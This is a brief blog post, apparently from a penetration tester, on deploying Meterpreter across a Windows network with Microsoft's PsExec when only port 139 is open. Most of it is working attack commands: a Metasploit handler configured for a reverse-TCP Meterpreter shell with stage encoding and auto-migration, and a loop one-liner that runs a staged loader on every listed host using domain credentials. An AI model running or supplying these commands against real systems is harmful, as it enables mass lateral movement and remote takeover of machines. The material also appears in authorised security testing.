My Client has closed all but port 139 of the netbios ports, preventing me from using Metaplsoit’s PSEXEC. But, Mark Russinovich’s version from Microsoft will work just as well, albeit a hell of a lot slower.
Prep your loader following the instructions at https://github.com/rsmudge/metasploit-loader
Nmap all the 139 open ports and drop them into a file. Set up your handler. I use this with good success:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set LHOST IPADDRESS
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j –z
Download the original PSEXEC from Microsoft and run the following Windows script one-liner:
FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\10.41.54.96\Share\stage.exe
If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN…
No comments:
Post a Comment
Thanks for adding to the conversation. I'll update your post shortly.